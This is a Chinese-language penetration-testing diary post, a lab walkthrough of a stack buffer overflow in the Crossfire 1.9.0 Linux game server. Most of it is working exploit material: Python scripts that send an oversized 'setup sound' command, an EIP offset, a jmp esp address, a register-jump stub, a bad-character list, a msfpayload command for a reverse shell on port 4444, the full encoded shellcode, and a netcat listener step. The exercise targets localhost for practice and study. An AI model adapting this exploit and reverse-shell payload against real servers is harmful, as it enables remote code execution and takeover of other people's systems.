小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0

Linux系统下穿越火线-缓冲区溢出

原理:crossfire 1.9.0 版本接受入站 socket 连接时存在缓冲区溢出漏洞。

工具:

调试工具:edb;

###python在漏洞溢出方面的渗透测试和漏洞攻击中,具有很大的优势

实验对象:crossfire【多人在线RPG游戏】

运行平台:Kali i686 虚拟机【32位,计算机CPU位数是指地址总线位数,64位系统的寻址空间为2^64,寻址过大,难以处理,为了简化本章操作,所以选用32位】

搭建实验环境

#linux中,游戏需安装带其game文件夹

服务器端程序

[email protected]:~# cd \Desktop
[email protected]:~/Desktop# ls
crossfire.tar.gz
[email protected]:~/Desktop# mv crossfire.tar.gz /usr/games
[email protected]:~/Desktop# cd /usr/games/
[email protected]:/usr/games# ls
crossfire.tar.gz
[email protected]:/usr/games# tar zxpf crossfire.tar.gz
[email protected]:/usr/games# ls -lh
total 4.8M
drwxr-xr-x 8 root root 4.0K Feb 10  2010 crossfire
-rwxrwx--- 1 root root 4.8M Aug 30 05:16 crossfire.tar.gz
[email protected]:/usr/games# cd crossfire/
[email protected]:/usr/games/crossfire# cd bin/
[email protected]:/usr/games/crossfire/bin# ls
crossedit  crossfire-config  crossloop.pl   player_dl.pl
crossfire  crossloop         crossloop.web
[email protected]:/usr/games/crossfire/bin#

#若出现缺少什么组件,可以相应去安装一下,只要看到出现waiting for connect,则基本没问题
查看端口开放情况【13327】

[email protected]:~# netstat -pantu
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:13327           0.0.0.0:*               LISTEN      4147/./crossfire
udp        0      0 0.0.0.0:68              0.0.0.0:*                           629/dhclient

调试工具


###也可用命令行来打开

新版本Linux内核支持内存保护机制

DEP、ASLR、堆栈cookies、堆栈粉碎

本机调试【防止在渗透测试过程中的非法网络访问,以防被黑客入侵电脑】

iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP #只有通过本机访问本地网卡的13327

iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP   #只有通过本机访问本地网卡4444

[email protected]:~# iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP
[email protected]:~# iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP
[email protected]:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere            !localhost            tcp dpt:13327
DROP       tcp  --  anywhere            !localhost            tcp dpt:4444

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
[email protected]:~#

调试工具

使用edb调试工具启动服务进行调试

edb --run /usr/games/crossfire/bin/crossfire

#需要重复点击两个Debug->run

查看EIP等寄存器地址,需要双击

01.py

#!/usr/bin/python

import socket

host = "127.0.0.1"
crash = "\x41" * 4379           ###crossfire必须在发送数值大小在一个固定数值的时候才能发生缓冲区溢出,只有当发送4379字符时,才能精确到溢出位置###
buffer = "\x11(setup sound " +crash+ "\x90\x90#)"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,1327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"

edb中一旦缓冲区溢出发生,无法进行下一条指令,会有告警弹窗


可确认存在缓冲区溢出漏洞

#通过修改发送“A”的数值,可验证只有当字符数量为4379才能精确修改EIP寄存器

唯一字符串精确定位EIP位置

/usr/share/metasploit-‐framework/tools/exploit/pattern_create.rb 4379

将唯一字符串添加到02.py

双击EIP

使用./pattren_offset.rb计算偏移量

则4368后四个字符为EIP地址

验证位置03.py

查看ESP数据部分Fellow in Dump

###因为ESP只能添7个字符才能精确修改EIP,所以shellcode不能放在ESP寄存器中。因此在剩下的寄存器中寻找

逐个查找,发现EAX可用

【因为setup sound为服务器指令,所以前十二个字符须先发送setup sound】

存在一个理论,直接在EAX的地址上加上12,可实现跳转,但是很大可能换一台机器后可能无法实现溢出,因为不同系统的EAX地址可能不一样

思路:【需考虑普适性】

第一阶段shellcode:从ESP【7个字节】 跳转到 EAX,在ESP中实现偏移12位字符

###一个5个字节,足够插进ESP中,实现跳转到EAX

\x83\xc0\x0c\xff\xe0\x90\x90      #\x90:跳转字符,防止被过滤【计算机读入数据顺序与人类阅读顺序相反】

04.py

查看ESP

#因为ESP的内存地址也不是固定的,所以需在系统中寻找固定跳转模块

寻址

利用edb中的插件Opcode search

使用第一个进程08048000,只要程序在运行,这个进程将一直存在,可以用于寻找jmp esp

###EIP->jmp ESP->ESP->EAX

查找坏字符

###\x00\x0a\x0d\x20

将256个编码放进脚本中逐一查找

设置断点(0x08134597)

EIP——08134597

则EIP跳转地址为

crash = "\x41" * 4368 + "\x97\x45\x13\x08"【EIP】 + "\x83\xc0\x0c\xff\xe0\x90\x90"【EAX】

04+.py

设置断点

->运行[F9]

按F8执行下一步

再按F8就跳入ESP寄存器

将4368个字符中,替换成shellcode,剩余位继续填充”A“【需计算shellcode字符数量】

生成shellcode姿势

[email protected]:/usr/share/framework2# ./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "\x00\x0a\x0d\x20"

注:在生成shellcode时,如果生成的shellcode不正确,可通过重启,解决

#!/usr/bin/python

import socket

host = "127.0.0.1"

shellcode = (
"\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"+
"\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"+
"\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"+
"\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"+
"\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"+
"\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"+
"\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"+
"\x1a\x99\x43\x71\x97\x54\x03")

crash = shellcode + "A"*(4368-105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
buffer = "\x11(setup sound " +crash+ "\x90\x90#)"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"

#打开侦听4444端口【当有人连接4444的时候,则getshell】

nc  127.0.0.1 4444 ###获得shell

小白日记,未完待续……

时间: 2024-10-20 22:54:29

小白日记18:kali渗透测试之缓冲区溢出实例(二)--Linux,穿越火线1.9.0的相关文章

小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧(包括参数.局部数据等),实现函数调用机制,它的数据增长方向是低地址方向.堆空间存储了程序运行时动态申请的内存数据等,数据增长方向是高地址方向.除了代码段和受操作系统保护的数据区域,其他的内存区域都可能作为缓冲区,因此缓冲区溢出的位置可能在数据段,也可能在堆.栈段.如果程序的代码有软件漏洞,恶意程序

小白日记12:kali渗透测试之服务扫描(二)-SMB扫描

SMB扫描 Server Message Block 协议.与其他标准的TCP/IP协议不同,SMB协议是一种复杂的协议,因为随着Windows计算机的开发,越来越多的功能被加入到协议中去了,很难区分哪些概念和功能应该属于Windows操作系统本身,哪些概念应该属于SMB 协议.因为该协议很复杂,所以是微软历史上出现安全问题最多的协议. 1.Nmap 最简单的方法:扫描其固定开放的端口139,445,但是无法准确判断其为windows系统 [email protected]:~# <strong

小白日记22:kali渗透测试之提权(二)--抓包嗅探

抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码. Windows系统 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只会抓取识别传输密码的明文协议,并提取密码 Linux系统 1.Tcpdump 2.Wirehshark 3.Dsniff 类似Sniffpass,只抓取密码(明文协议),在kali下默认集成. 测试 打开ftp服务  #service pure-ftpd start 启动:dsniff -i eth0 在其他主机上连接ftp服务

小白日记7:kali渗透测试之主动信息收集-发现(一)--二层发现:arping/shell脚本,Netdiscover,scapy

主动信息收集 被动信息收集可能不准确,可以用主动信息收集验证 特点:直接与目标系统交互通信,无法避免留下访问痕迹 解决方法:1.使用受控的第三方电脑进行探测,使用代理 (做好被封杀的准备) 2.伪造大量的来源IP进行探测,进行噪声迷惑,淹没真是的探测流量 扫描流程:发送不同的探测,根据返回结果判断目标状态[IP层->端口层->服务层] 发现 识别活着的主机,发现潜在的被攻击目标,输出结果为IP地址列表. 二层发现 数据电路层,使用ARP协议 使用场景:已经取得一台主机,进入内网,对内网进行渗透

小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

发现漏洞 弱点发现方法: 1.基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大. 2.搜索已公开的漏洞数据库,但数量大. ##其中会有漏洞利用代码,如:https://www.exploit-db.com/ [kali集成] [email protected]:~# searchsploit tomcat -------------------------------------------

小白日记10:kali渗透测试之端口扫描-UDP、TCP、僵尸扫描、隐蔽扫描

端口扫描 二三四层发现的目的只是为了准确发现所有活着主机IP,确定攻击面,端口扫描即发现攻击点,发现开放端口.端口对应网络服务及应用端程序,服务端程序的漏洞通过端口攻入.[所有的扫描结果,都不要完全相信] 一个端口就是一个潜在的通信通道,也就是一个入侵通道.对目标计算机进行端口扫描,能得到许多有用的信息.进行扫描的方法很多,可以是手工进行扫描,也可以用端口扫描软件进行扫描.在手工进行扫描时,需要熟悉各种命令.对命令执行后的输出进行分析.用扫描软件进行扫描时,许多扫描器软件都有分析数据的功能.通过

小白日记8:kali渗透测试之主动信息收集(二)三层发现:ping、traceroute、scapy、nmap、fping、Hping

三层发现 三层协议有:IP以及ICMP协议(internet管理协议).icmp的作用是用来实现intenet管理的,进行路径的发现,网路通信情况,或者目标主机的状态:在三层发现中主要使用icmp协议,arp协议属于二层协议,它是基于广播的,所以不可路由.而ICMP协议是可以路由的,理论上可以使用icmp协议发现全球的ip,如果没有边界防火墙(禁止icmp的探测包)进行过滤的话,对目标主机进行扫描,则会收到相应的响应,从而进行捕捉[有边界防火墙的现象比较普遍],但是三层发现的扫描速度也较二层要慢

小白日记13:kali渗透测试之服务扫描(三)-SMTB扫描、防火墙识别、负载均衡识别、WAF识别

SMTP扫描 SMTP(Simple Mail Transfer Protocol)即简单邮件传输协议,它是一组用于由源地址到目的地址传送邮件的规则,由它来控制信件的中转方式.SMTP协议属于TCP/IP协议簇,它帮助每台计算机在发送或中转信件时找到下一个目的地.通过SMTP协议所指定的服务器,就可以把E-mail寄到收信人的服务器上了,整个过程只要几分钟.SMTP服务器则是遵循SMTP协议的发送邮件服务器,用来发送或中转发出的电子邮件. SMB扫描针对机器去发现其漏洞,SMTP扫描为主动发现目

小白日记6:kali渗透测试之被动信息收集(五)-Recon-ng

Recon-ng Recon-NG是由python编写的一个开源的Web侦查(信息收集)框架.Recon-ng框架是一个全特性的工具,使用它可以自动的收集信息和网络侦查.其命令格式与Metasploit!默认集成数据库,可把查询结果结构化存储在其中,有报告模块,把结果导出为报告. 点击打开链接 1.启动Recon-NG框架 [recon-ng][default] >提示符表示启动成功 <span style="font-size:18px;">[email prote